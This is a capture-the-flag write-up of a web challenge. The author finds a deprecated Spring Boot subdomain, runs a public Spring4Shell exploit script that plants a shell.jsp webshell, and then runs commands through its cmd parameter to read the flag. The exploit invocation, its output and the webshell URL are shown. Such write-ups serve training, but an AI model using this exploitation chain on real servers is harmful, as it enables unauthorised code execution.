Statement: Oook! That’s a hard one! I just want to buy some tubes, but I think that the main site is disabled… What now?


For this challenge, the website has nothing interesting except the information in the footer:

<footer>
  <p>For the complete functionality of the page add the following entries to your DNS configuration and use tube.com:PORT to connect to the platform.<br>
    34.65.33.171 tube.com<br>
    34.65.33.171 legacy.tube.com<br>
    DO NOT USE THIS IN PRODUCTION!</p>
</footer>

I add on my local machine in the file /etc/hosts the following entries:

34.65.33.171	tube.com
34.65.33.171	legacy.tube.com

Now, the website with the domain name legacy.tube.com seems interesting. We can see in the HTML source code the following comment:

  <!--
    Important!
    Due to the recent discovery of a major vulnerability of the used framework, this platform is now deprecated (more information at /info).
    It remains available only for backward compatibility reasons.

    DO NOT USE THIS PLATFORM IN PRODUCTION!
  -->

So I go to the following URL: http://legacy.tube.com:49445/info

DEVELOPER: Mark Doe
FRAMEWORK: spring-boot
TAG: COMPROMISED
DATE: 30.03.2022
CURRENT_STATUS: patch in devlopment

This page tells us that the spring-boot version is compromised.

After some research, I find a git repo to get a webshell with spring4shell exploit.

POC of exploit :

python exploit.py --url "http://legacy.tube.com:49445"                                                                                                                                   ──(dim.,juil.31)─┘
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://legacy.tube.com:49445/shell.jsp?cmd=id

By going to the given URL, we can perform RCE with the parameter cmd:

uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) //

A ls&cat allows us to get back the flag.

Flag : TFCCTF{F*_$pr1nG!_I_m_m0R3_0f_4_w1nt3r_p3r$0n_aNyw4y!}